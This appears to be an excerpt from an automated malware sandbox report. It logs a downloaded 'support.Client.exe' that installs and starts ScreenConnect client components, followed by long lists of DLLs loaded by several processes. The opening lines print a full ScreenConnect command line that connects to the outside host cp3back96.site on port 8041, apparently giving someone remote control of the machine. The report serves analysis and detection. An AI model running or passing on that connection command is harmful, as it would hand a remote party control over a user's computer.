              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User"
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System"
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: dfshim.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: shdocvw.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: thumbcache.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
